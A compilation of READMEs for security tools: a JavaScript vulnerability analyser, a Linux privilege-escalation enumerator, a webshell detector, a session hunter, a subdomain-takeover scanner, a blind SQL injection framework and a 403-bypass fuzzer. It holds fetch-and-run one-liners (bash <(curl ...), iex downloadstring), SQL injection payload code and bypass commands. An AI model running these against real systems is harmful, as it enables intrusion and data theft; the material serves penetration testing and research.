
JAW - A Graph-based Security Analysis Framework For Client-side JavaScript


An open-source, prototype implementation of property graphs for JavaScript based on the esprima parser, and the EsTree SpiderMonkey Spec. JAW can be used for analyzing the client-side of web applications and JavaScript-based programs.

This project is licensed under GNU AFFERO GENERAL PUBLIC LICENSE V3.0. See here for more information.

JAW has a Github pages website available at https://soheilkhodayari.github.io/JAW/.

Release Notes:


Overview of JAW

The architecture of JAW is shown below.

Test Inputs

JAW can be used in two distinct ways:

  1. Arbitrary JavaScript Analysis: Utilize JAW for modeling and analyzing any JavaScript program by specifying the program's file system path.

  2. Web Application Analysis: Analyze a web application by providing a single seed URL.

Data Collection

  • JAW features several JavaScript-enabled web crawlers for collecting web resources at scale.

HPG Construction

  • Use the collected web resources to create a Hybrid Program Graph (HPG), which will be imported into a Neo4j database.

  • Optionally, supply the HPG construction module with a mapping of semantic types to custom JavaScript language tokens, facilitating the categorization of JavaScript functions based on their purpose (e.g., HTTP request functions); a hypothetical sketch of such a mapping is shown below.
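
The exact mapping format is defined by JAW's own configuration; purely as a hypothetical illustration of the idea (the type names and tokens below are invented, not JAW's schema), such a mapping could look like:

# Hypothetical illustration only: semantic types mapped to JavaScript tokens
# that indicate them (not JAW's actual configuration format).
SEMANTIC_TYPES = {
    "REQ": ["fetch", "XMLHttpRequest", "$.ajax"],          # HTTP request functions
    "WIN.LOC": ["window.location", "document.location"],   # URL / location reads
    "COOKIE": ["document.cookie"],                          # cookie access
}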

Analysis and Outputs

  • Query the constructed Neo4j graph database for various analyses. JAW offers utility traversals for data flow analysis, control flow analysis, reachability analysis, and pattern matching. These traversals can be used to develop custom security analyses.

  • JAW also includes built-in traversals for detecting client-side CSRF, DOM Clobbering and request hijacking vulnerabilities.

  • The outputs will be stored in the same folder as the input.

Setup

The installation script relies on the following prerequisites:

  • Latest version of the npm package manager (Node.js)
  • Any stable version of Python 3.x
  • The Python pip package manager

Afterwards, install the necessary dependencies via:

$ ./install.sh

For detailed installation instructions, please see here.

Quick Start

Running the Pipeline

You can run an instance of the pipeline in a background screen via:

$ python3 -m run_pipeline --conf=config.yaml

The CLI provides the following options:

$ python3 -m run_pipeline -h

usage: run_pipeline.py [-h] [--conf FILE] [--site SITE] [--list LIST] [--from FROM] [--to TO]

This script runs the tool pipeline.

optional arguments:
-h, --help show this help message and exit
--conf FILE, -C FILE pipeline configuration file. (default: config.yaml)
--site SITE, -S SITE website to test; overrides config file (default: None)
--list LIST, -L LIST site list to test; overrides config file (default: None)
--from FROM, -F FROM the first entry to consider when a site list is provided; overrides config file (default: -1)
--to TO, -T TO the last entry to consider when a site list is provided; overrides config file (default: -1)

Input Config: JAW expects a .yaml config file as input. See config.yaml for an example.

Hint. The config file specifies different passes (e.g., crawling, static analysis, etc) which can be enabled or disabled for each vulnerability class. This allows running the tool building blocks individually, or in a different order (e.g., crawl all webapps first, then conduct security analysis).

Quick Example

For running a quick example demonstrating how to build a property graph and run Cypher queries over it, do:

$ python3 -m analyses.example.example_analysis --input=$(pwd)/data/test_program/test.js

Crawling and Data Collection

This module collects the data (i.e., JavaScript code and state values of web pages) needed for testing. If you want to test a specific JavaScript file that you already have on your file system, you can skip this step.

JAW has crawlers based on Selenium (JAW-v1), Puppeteer (JAW-v2, v3) and Playwright (JAW-v3). For most up-to-date features, it is recommended to use the Puppeteer- or Playwright-based versions.

Playwright CLI with Foxhound

This web crawler employs foxhound, an instrumented version of Firefox, to perform dynamic taint tracking as it navigates through webpages. To start the crawler, do:

$ cd crawler
$ node crawler-taint.js --seedurl=https://google.com --maxurls=100 --headless=true --foxhoundpath=<optional-foxhound-executable-path>

The foxhoundpath is by default set to the following directory: crawler/foxhound/firefox which contains a binary named firefox.

Note: you need a build of foxhound to use this version. An ubuntu build is included in the JAW-v3 release.

Puppeteer CLI

To start the crawler, do:

$ cd crawler
$ node crawler.js --seedurl=https://google.com --maxurls=100 --browser=chrome --headless=true

See here for more information.

Selenium CLI

To start the crawler, do:

$ cd crawler/hpg_crawler
$ vim docker-compose.yaml # set the websites you want to crawl here and save
$ docker-compose build
$ docker-compose up -d

Please refer to the documentation of the hpg_crawler here for more information.

Graph Construction

HPG Construction CLI

To generate an HPG for a given (set of) JavaScript file(s), do:

$ node engine/cli.js  --lang=js --graphid=graph1 --input=/in/file1.js --input=/in/file2.js --output=$(pwd)/data/out/ --mode=csv

optional arguments:
--lang: language of the input program
--graphid: an identifier for the generated HPG
--input: path of the input program(s)
--output: path of the output HPG, must be i
--mode: determines the output format (csv or graphML)

HPG Import CLI

To import an HPG inside a neo4j graph database (docker instance), do:

$ python3 -m hpg_neo4j.hpg_import --rpath=<path-to-the-folder-of-the-csv-files> --id=<xyz> --nodes=<nodes.csv> --edges=<rels.csv>
$ python3 -m hpg_neo4j.hpg_import -h

usage: hpg_import.py [-h] [--rpath P] [--id I] [--nodes N] [--edges E]

This script imports a CSV of a property graph into a neo4j docker database.

optional arguments:
-h, --help show this help message and exit
--rpath P relative path to the folder containing the graph CSV files inside the `data` directory
--id I an identifier for the graph or docker container
--nodes N the name of the nodes csv file (default: nodes.csv)
--edges E the name of the relations csv file (default: rels.csv)

HPG Construction and Import CLI (v1)

In order to create a hybrid property graph for the output of the hpg_crawler and import it inside a local neo4j instance, you can also do:

$ python3 -m engine.api <path> --js=<program.js> --import=<bool> --hybrid=<bool> --reqs=<requests.out> --evts=<events.out> --cookies=<cookies.pkl> --html=<html_snapshot.html>

Specification of Parameters:

  • <path>: absolute path to the folder containing the program files for analysis (must be under the engine/outputs folder).
  • --js=<program.js>: name of the JavaScript program for analysis (default: js_program.js).
  • --import=<bool>: whether the constructed property graph should be imported to an active neo4j database (default: true).
  • --hybrid=<bool>: whether the hybrid mode is enabled (default: false). This implies that the tester wants to enrich the property graph by inputting files for any of the HTML snapshot, fired events, HTTP requests and cookies, as collected by the JAW crawler.
  • --reqs=<requests.out>: for hybrid mode only, name of the file containing the sequence of observed network requests, pass the string false to exclude (default: request_logs_short.out).
  • --evts=<events.out>: for hybrid mode only, name of the file containing the sequence of fired events, pass the string false to exclude (default: events.out).
  • --cookies=<cookies.pkl>: for hybrid mode only, name of the file containing the cookies, pass the string false to exclude (default: cookies.pkl).
  • --html=<html_snapshot.html>: for hybrid mode only, name of the file containing the DOM tree snapshot, pass the string false to exclude (default: html_rendered.html).

For more information, you can use the help CLI provided with the graph construction API:

$ python3 -m engine.api -h

Security Analysis

The constructed HPG can then be queried using Cypher or the NeoModel ORM.

Running Custom Graph traversals

You should place and run your queries in analyses/<ANALYSIS_NAME>.

Option 1: Using the NeoModel ORM (Deprecated)

You can use the NeoModel ORM to query the HPG. To write a query:

  • (1) Check out the HPG data model and syntax tree.
  • (2) Check out the ORM model for HPGs
  • (3) See the example query file provided; example_query_orm.py in the analyses/example folder.
$ python3 -m analyses.example.example_query_orm  

For more information, please see here.

Option 2: Using Cypher Queries

You can use Cypher to write custom queries. For this:

  • (1) Check out the HPG data model and syntax tree.
  • (2) See the example query file provided; example_query_cypher.py in the analyses/example folder.
$ python3 -m analyses.example.example_query_cypher

For more information, please see here.
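
As a minimal illustration (connection details and the query are placeholders, and this is not taken from JAW's own example files), a Cypher query can be run against the imported HPG with the official neo4j Python driver:

from neo4j import GraphDatabase  # pip install neo4j

# Minimal sketch: connect to the Neo4j instance holding the HPG and run a
# trivial Cypher query. Credentials and the query are placeholders.
driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "password"))
with driver.session() as session:
    record = session.run("MATCH (n) RETURN count(n) AS nodes").single()
    print("nodes in the HPG:", record["nodes"])
driver.close()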

Vulnerability Detection

This section describes how to configure and use JAW for vulnerability detection, and how to interpret the output. JAW contains, among others, self-contained queries for detecting client-side CSRF and DOM Clobbering.

Step 1. enable the analysis component for the vulnerability class in the input config.yaml file:

request_hijacking:
enabled: true
# [...]
#
domclobbering:
enabled: false
# [...]

cs_csrf:
enabled: false
# [...]

Step 2. Run an instance of the pipeline with:

$ python3 -m run_pipeline --conf=config.yaml

Hint. You can run multiple instances of the pipeline under different screens:

$ screen -dmS s1 bash -c 'python3 -m run_pipeline --conf=conf1.yaml; exec sh'
$ screen -dmS s2 bash -c 'python3 -m run_pipeline --conf=conf2.yaml; exec sh'
$ # [...]

To generate parallel configuration files automatically, you may use the generate_config.py script.

How to Interpret the Output of the Analysis?

The outputs will be stored in a file called sink.flows.out in the same folder as the input. For Client-side CSRF, for example, for each HTTP request detected, JAW outputs an entry marking the set of semantic types (a.k.a. semantic tags or labels) associated with the elements constructing the request (i.e., the program slices). For example, an HTTP request marked with the semantic type ['WIN.LOC'] is forgeable through the window.location injection point. In contrast, a request marked with ['NON-REACH'] is not forgeable.

An example output entry is shown below:

[*] Tags: ['WIN.LOC']
[*] NodeId: {'TopExpression': '86', 'CallExpression': '87', 'Argument': '94'}
[*] Location: 29
[*] Function: ajax
[*] Template: ajaxloc + "/bearer1234/"
[*] Top Expression: $.ajax({ xhrFields: { withCredentials: "true" }, url: ajaxloc + "/bearer1234/" })

1:['WIN.LOC'] variable=ajaxloc
0 (loc:6)- var ajaxloc = window.location.href

This entry shows that on line 29 there is a $.ajax call expression, and this call expression triggers an ajax request with the url template value of ajaxloc + "/bearer1234/", where the parameter ajaxloc is a program slice reading its value at line 6 from window.location.href, thus forgeable through ['WIN.LOC'].

Test Web Application

In order to streamline the testing process for JAW and ensure that your setup is accurate, we provide a simple node.js web application which you can test JAW with.

First, install the dependencies via:

$ cd tests/test-webapp
$ npm install

Then, run the application in a new screen:

$ screen -dmS jawwebapp bash -c 'PORT=6789 npm run devstart; exec sh'

Detailed Documentation

For more information, visit our wiki page here. Below is a table of contents for quick access.

The Web Crawler of JAW

Data Model of Hybrid Property Graphs (HPGs)

Graph Construction

Graph Traversals

Contribution and Code Of Conduct

Pull requests are always welcome. This project is intended to be a safe, welcoming space, and contributors are expected to adhere to the contributor code of conduct.

Academic Publication

If you use the JAW for academic research, we encourage you to cite the following paper:

@inproceedings{JAW,
title = {JAW: Studying Client-side CSRF with Hybrid Property Graphs and Declarative Traversals},
author= {Soheil Khodayari and Giancarlo Pellegrino},
booktitle = {30th {USENIX} Security Symposium ({USENIX} Security 21)},
year = {2021},
address = {Vancouver, B.C.},
publisher = {{USENIX} Association},
}

Acknowledgements

JAW has come a long way and we want to give our contributors a well-deserved shoutout here!

@tmbrbr, @c01gide, @jndre, and Sepehr Mirzaei.



Linux-Smart-Enumeration - Linux Enumeration Tool For Pentesting And CTFs With Verbosity Levels


First, a couple of useful oneliners ;)

wget "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -O lse.sh;chmod 700 lse.sh
curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

Note that since version 2.10 you can serve the script to other hosts with the -S flag!


linux-smart-enumeration

Linux enumeration tools for pentesting and CTFs

This project was inspired by https://github.com/rebootuser/LinEnum and uses many of its tests.

Unlike LinEnum, lse tries to gradually expose the information depending on its importance from a privesc point of view.

What is it?

This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.

From version 2.0 it is mostly POSIX compliant and tested with shellcheck and posh.

It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests, so you save some time. By default it monitors for 1 minute, but you can choose the watch time with the -p parameter.

It has 3 levels of verbosity so you can control how much information you see.

In the default level you should see the highly important security flaws in the system. The level 1 (./lse.sh -l1) shows interesting information that should help you to privesc. The level 2 (./lse.sh -l2) will just dump all the information it gathers about the system.

By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.

How to use it?

The idea is to get the information gradually.

First you should execute it just like ./lse.sh. If you see some green yes!, you probably already have some good stuff to work with.

If not, you should try the level 1 verbosity with ./lse.sh -l1 and you will see some more information that can be interesting.

If that does not help, level 2 will just dump everything you can gather about the service using ./lse.sh -l2. In this case you might find it useful to use ./lse.sh -l2 | less -r.

You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./lse.sh -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.

Use: ./lse.sh [options]

OPTIONS
-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
sections:
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurrent tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
cve: CVE related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)
-e PATHS Comma separated list of paths to exclude. This allows you
to do faster scans at the cost of completeness
-p SECONDS Time that the process monitor will spend watching for
processes. A value of 0 will disable any watch (default: 60)
-S Serve the lse.sh script in this host so it can be retrieved
from a remote host.

Is it pretty?

Usage demo

Also available in webm video


Level 0 (default) output sample


Level 1 verbosity output sample


Level 2 verbosity output sample


Examples

Direct execution oneliners

bash <(wget -q -O - "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l2 -i
bash <(curl -s "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh") -l1 -i



ShellSweep - PowerShell/Python/Lua Tool Designed To Detect Potential Webshell Files In A Specified Directory






ShellSweep

ShellSweeping the evil

Why ShellSweep

"ShellSweep" is a PowerShell/Python/Lua tool designed to detect potential webshell files in a specified directory.

ShellSweep and its suite of tools calculate the entropy of file contents to estimate the likelihood of a file being a webshell. High entropy indicates more randomness, which is characteristic of the encrypted or obfuscated code often found in webshells.

  • It only processes files with certain extensions (.asp, .aspx, .asph, .php, .jsp), which are commonly used in webshells.
  • Certain directories can be excluded from scanning.
  • Files with certain hashes can be ignored during the scan.


How does ShellSweep find the shells?

Entropy, in the context of information theory or data science, is a measure of the unpredictability, randomness, or disorder in a set of data. The concept was introduced by Claude Shannon in his 1948 paper "A Mathematical Theory of Communication".

When applied to a file or a string of text, entropy can help assess the randomness of the data. Here's how it works: If a file consists of completely random data (each byte is just as likely to be any value between 0 and 255), the entropy is high, close to 8 (since log2(256) = 8).

If a file consists of highly structured data (for example, a text file where most bytes are ASCII characters), the entropy is lower. In the context of finding webshells or malicious files, entropy can be a useful indicator:

  • Many obfuscated scripts or encrypted payloads can have high entropy because the obfuscation or encryption process makes the data look random.
  • A normal text file or HTML file would generally have lower entropy because human-readable text has patterns and structure (certain letters are more common, words are usually separated by spaces, etc.).

So, a file with unusually high entropy might be suspicious and worth further investigation. However, it's not a surefire indicator of maliciousness -- there are plenty of legitimate reasons a file might have high entropy, and plenty of ways malware might avoid causing high entropy. It's just one tool in a larger toolbox for detecting potential threats.

ShellSweep includes a Get-Entropy function that calculates the entropy of a file's contents by:

  • Counting how often each character appears in the file.
  • Using these frequencies to calculate the probability of each character.
  • Summing -p*log2(p) for each character, where p is the character's probability. This is the formula for entropy in information theory.
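
As a rough Python sketch of that calculation (a simplified illustration, not ShellSweep's own code; the file path is a placeholder):

import math
from collections import Counter

# Character frequencies -> probabilities -> sum of -p*log2(p).
def shannon_entropy(data: str) -> float:
    if not data:
        return 0.0
    counts = Counter(data)
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())

with open("suspect.aspx", errors="ignore") as f:
    print(round(shannon_entropy(f.read()), 4))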

ShellScan

ShellScan provides the ability to scan multiple known bad webshell directories and output the average, median, minimum and maximum entropy values by file extension.

Pass ShellScan.ps1 some directories of webshells, any size set. I used:

  • https://github.com/tennc/webshell
  • https://github.com/BlackArch/webshells
  • https://github.com/tarwich/jackal/blob/master/libraries/

This will give a decent training set to get entropy values.

Output example:

Statistics for .aspx files:
Average entropy: 4.94212121048115
Minimum entropy: 1.29348709979974
Maximum entropy: 6.09830238020383
Median entropy: 4.85437969842084
Statistics for .asp files:
Average entropy: 5.51268104400858
Minimum entropy: 0.732406213077191
Maximum entropy: 7.69241278153711
Median entropy: 5.57351177724806

ShellCSV

First, let's break down the usage of ShellCSV and how it assists with identifying entropy of the good files on disk. The idea is that defenders can run this on web servers to gather all files and entropy values to better understand what paths and extensions are most prominent in their working environment.

See ShellCSV.csv as example output.

ShellSweep

First, choose your flavor: Python, PowerShell or Lua.

  • Based on results from ShellScan or ShellCSV, modify entropy values as needed.
  • Modify file extensions as needed. No need to look for ASPX on a non-ASPX app.
  • Modify paths. I don't recommend just scanning all of C:\, there's a lot to filter.
  • Modify any filters needed.
  • Run it!

If you made it here, this is the part where you iterate on tuning. Find new shell? Gather entropy and modify as needed.

Questions

Feel free to open a Git issue.

Thank You

If you enjoyed this project, be sure to star the project and share with your family and friends.



Invoke-SessionHunter - Retrieve And Display Information About Active User Sessions On Remote Computers (No Admin Privileges Required)


Retrieve and display information about active user sessions on remote computers. No admin privileges required.

The tool leverages the remote registry service to query the HKEY_USERS registry hive on the remote computers. It identifies and extracts Security Identifiers (SIDs) associated with active user sessions, and translates these into corresponding usernames, offering insights into who is currently logged in.

If the -CheckAsAdmin switch is provided, it will gather sessions by authenticating to targets where you have local admin access using Invoke-WMIRemoting (which most likely will retrieve more results)

It's important to note that the remote registry service needs to be running on the remote computer for the tool to work effectively. In my tests, if the service is stopped but its Startup type is configured to "Automatic" or "Manual", the service will start automatically on the target computer once queried (this is native behavior), and session information will be retrieved. If set to "Disabled", no session information can be retrieved from the target.
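
As a rough illustration of that data source (a hedged sketch, not the tool's PowerShell implementation; the host name is a placeholder and SID-to-username translation is omitted), the SIDs of loaded user hives can be read over the Remote Registry service from Python on Windows:

import winreg

# Connect to HKEY_USERS on a remote host via the Remote Registry service
# and list the SIDs of loaded user hives (i.e., active sessions).
remote = winreg.ConnectRegistry(r"\\WORKSTATION01", winreg.HKEY_USERS)
index = 0
while True:
    try:
        sid = winreg.EnumKey(remote, index)
    except OSError:
        break  # no more subkeys
    if sid.startswith("S-1-5-21-") and not sid.endswith("_Classes"):
        print(sid)
    index += 1
winreg.CloseKey(remote)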


Usage:

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-SessionHunter/main/Invoke-SessionHunter.ps1')

If run without parameters or switches it will retrieve active sessions for all computers in the current domain by querying the registry

Invoke-SessionHunter

Gather sessions by authenticating to targets where you have local admin access

Invoke-SessionHunter -CheckAsAdmin

You can optionally provide credentials in the following format

Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!"

You can also use the -FailSafe switch, which will direct the tool to proceed if the target remote registry becomes unresponsive.

This works in combination with -Timeout (default: 2); increase it for slower networks.

Invoke-SessionHunter -FailSafe
Invoke-SessionHunter -FailSafe -Timeout 5

Use the -Match switch to show only targets where you have admin access and a privileged user is logged in

Invoke-SessionHunter -Match

All switches can be combined

Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!" -FailSafe -Timeout 5 -Match

Specify the target domain

Invoke-SessionHunter -Domain contoso.local

Specify a comma-separated list of targets or the full path to a file containing a list of targets - one per line

Invoke-SessionHunter -Targets "DC01,Workstation01.contoso.local"
Invoke-SessionHunter -Targets c:\Users\Public\Documents\targets.txt

Retrieve and display information about active user sessions on servers only

Invoke-SessionHunter -Servers

Retrieve and display information about active user sessions on workstations only

Invoke-SessionHunter -Workstations

Show active session for the specified user only

Invoke-SessionHunter -Hunt "Administrator"

Include localhost in the sessions retrieval

Invoke-SessionHunter -IncludeLocalHost

Return custom PSObjects instead of table-formatted results

Invoke-SessionHunter -RawResults

Do not run a port scan to enumerate for alive hosts before trying to retrieve sessions

Note: if a host is not reachable it will hang for a while

Invoke-SessionHunter -NoPortScan


Subhunter - A Fast Subdomain Takeover Tool


Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of subdomains and scans them to check for this vulnerability.
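
As a simplified illustration of the underlying check (Subhunter itself matches CNAME targets and responses against its fingerprint data; the domain below is a placeholder):

import dns.resolver  # pip install dnspython

# A CNAME whose target no longer resolves is the classic dangling-record
# signal that a subdomain may be vulnerable to takeover.
def looks_dangling(subdomain: str) -> bool:
    try:
        cname = dns.resolver.resolve(subdomain, "CNAME")[0].target.to_text()
    except Exception:
        return False  # no CNAME record at all
    try:
        dns.resolver.resolve(cname, "A")
        return False  # CNAME target still resolves
    except dns.resolver.NXDOMAIN:
        return True   # target is gone: candidate for takeover

print(looks_dangling("sub.example.com"))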


Features:

  • Auto update
  • Uses random user agents
  • Built in Go
  • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

Installation:

Option 1:

Download from releases

Option 2:

Build from source:

$ git clone https://github.com/Nemesis0U/Subhunter.git
$ go build subhunter.go

Usage:

Options:

Usage of subhunter:
-l string
File including a list of hosts to scan
-o string
File to save results
-t int
Number of threads for scanning (default 50)
-timeout int
Timeout in seconds (default 20)

Demo (Added fake fingerprint for POC):

./Subhunter -l subdomains.txt -o test.txt

____ _ _ _
/ ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
\___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
|____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


A fast subdomain takeover tool

Created by Nemesis

Loaded 88 fingerprints for current scan

-----------------------------------------------------------------------------

[+] Nothing found at www.ubereats.com: Not Vulnerable
[+] Nothing found at testauth.ubereats.com: Not Vulnerable
[+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
[+] Nothing found at about.ubereats.com: Not Vulnerable
[+] Nothing found at beta.ubereats.com: Not Vulnerable
[+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothing found at edgetest.ubereats.com: Not Vulnerable
[+] Nothing found at guest.ubereats.com: Not Vulnerable
[+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
[+] Nothing found at info.ubereats.com: Not Vulnerable
[+] Nothing found at learn.ubereats.com: Not Vulnerable
[+] Nothing found at merchants.ubereats.com: Not Vulnerable
[+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
[+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
[+] Nothing found at messages.ubereats.com: Not Vulnerable
[+] Nothing found at order.ubereats.com: Not Vulnerable
[+] Nothing found at restaurants.ubereats.com: Not Vulnerable
[+] Nothing found at payments.ubereats.com: Not Vulnerable
[+] Nothing found at static.ubereats.com: Not Vulnerable

Subhunter exiting...
Results written to test.txt




Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework


Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

Hakuin has been presented at esteemed academic and industrial conferences:

  • BlackHat MEA, Riyadh, 2023
  • Hack in the Box, Phuket, 2023
  • IEEE S&P Workshop on Offensive Technology (WOOT), 2023

More information can be found in our paper and slides.


Installation

To install Hakuin, simply run:

pip3 install hakuin

Developers should install the package locally and set the -e flag for editable mode:

git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .

Examples

Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from Requester and override the request method. The method must determine whether the query resolved to True or False.

Example 1 - Query Parameter Injection with Status-based Inference
import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
    async def request(self, ctx, query):
        url = f'http://vuln.com/?n=XXX" OR ({query}) --'
        async with aiohttp.ClientSession() as session:
            async with session.get(url) as r:
                return r.status == 200
Example 2 - Header Injection with Content-based Inference
class ContentRequester(Requester):
    async def request(self, ctx, query):
        headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
        async with aiohttp.ClientSession() as session:
            async with session.get('http://vuln.com/', headers=headers) as r:
                return 'found' in await r.text()

To start extracting data, use the Extractor class. It requires a DBMS object to construct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

class StatusRequester(Requester):
    ...

async def main():
    # requester: Use this Requester
    # dbms:      Use this DBMS
    # n_tasks:   Spawns N tasks that extract column rows in parallel
    ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
    ...

if __name__ == '__main__':
    asyncio.get_event_loop().run_until_complete(main())

Now that everything is set, you can start extracting DB metadata.

Example 1 - Extracting DB Schemas
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
Example 2 - Extracting Tables
tables = await ext.extract_table_names(strategy='model')
Example 3 - Extracting Columns
columns = await ext.extract_column_names(table='users', strategy='model')
Example 4 - Extracting Tables and Columns Together
metadata = await ext.extract_meta(strategy='model')

Once you know the structure, you can extract the actual content.

Example 1 - Extracting Generic Columns
# text_strategy:    Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
Example 2 - Extracting Textual Columns
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
Example 3 - Extracting Integer Columns
res = await ext.extract_column_int(table='users', column='id')
Example 4 - Extracting Float Columns
res = await ext.extract_column_float(table='products', column='price')
Example 5 - Extracting Blob (Binary Data) Columns
res = await ext.extract_column_blob(table='users', column='id')

More examples can be found in the tests directory.

Using Hakuin from the Command Line

Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

python3 hk.py -h

For Researchers

This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

Cite Hakuin

@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}


BypassFuzzer - Fuzz 401/403/404 Pages For Bypasses


The original 403fuzzer.py :)

Fuzz 401/403ing endpoints for bypasses

This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACLs or URL validation.
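
As a tiny illustration of the kinds of checks described (a hypothetical payload list using the requests library, not the tool's actual payload set):

import requests

base = "https://example.com"
path = "/forbidden"

# A few path-normalization variants and spoofed-source headers; compare
# status codes and lengths against the original forbidden response.
paths = [path, "/" + path, path + "/.", "/%2e" + path, path + "%20"]
headers_list = [{}, {"X-Forwarded-For": "127.0.0.1"}, {"X-Original-URL": path}]

for p in paths:
    for hdrs in headers_list:
        r = requests.get(base + p, headers=hdrs, allow_redirects=False)
        print(r.status_code, len(r.content), p, hdrs)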

It will output the response codes and length for each request, in a nicely organized, color coded way so things are readable.

I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.

You can now feed it raw HTTP requests that you save to a file from Burp.

Follow me on twitter! @intrudir


Usage

usage: bypassfuzzer.py -h

Specifying a request to test

Best method: Feed it a raw HTTP request from Burp!

Simply paste the request into a file and run the script!
  • It will parse and use cookies & headers from the request.
  • Easiest way to authenticate for your requests

python3 bypassfuzzer.py -r request.txt

Using other flags

Specify a URL

python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html

Specify cookies to use in requests:
some examples:

--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"

Specify a method/verb and body data to send

bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah&param2=blah2"
bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah&param2=blah2"

Specify custom headers to use with every request. Maybe you need to add some kind of auth header like Authorization: bearer <token>.

Specify -H "header: value" for each additional header you'd like to add:

bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"

Smart filter feature!

It is based on response code and length. If it sees a response 8 times or more, it will automatically mute it.

Repeats are changeable in the code until I add an option to specify it via a flag.

NOTE: Can't be used simultaneously with -hc or -hl (yet)

# toggle smart filter on
bypassfuzzer.py -u https://example.com/forbidden --smart
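
As a rough sketch of that filtering idea (illustrative only, not the tool's implementation):

from collections import Counter

REPEAT_LIMIT = 8   # mute a response after seeing it this many times
seen = Counter()

def should_report(status_code: int, length: int) -> bool:
    # Responses are keyed by (status code, body length), as described above.
    key = (status_code, length)
    seen[key] += 1
    return seen[key] < REPEAT_LIMIT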

Specify a proxy to use

Useful if you wanna proxy through Burp

bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080

Skip sending header payloads or url payloads

# skip sending headers payloads
bypassfuzzer.py -u https://example.com/forbidden -sh
bypassfuzzer.py -u https://example.com/forbidden --skip-headers

# Skip sending path normalization payloads
bypassfuzzer.py -u https://example.com/forbidden -su
bypassfuzzer.py -u https://example.com/forbidden --skip-urls

Hide response code/length

Provide comma delimited lists without spaces. Examples:

# Hide response codes
bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400

# Hide response lengths of 638
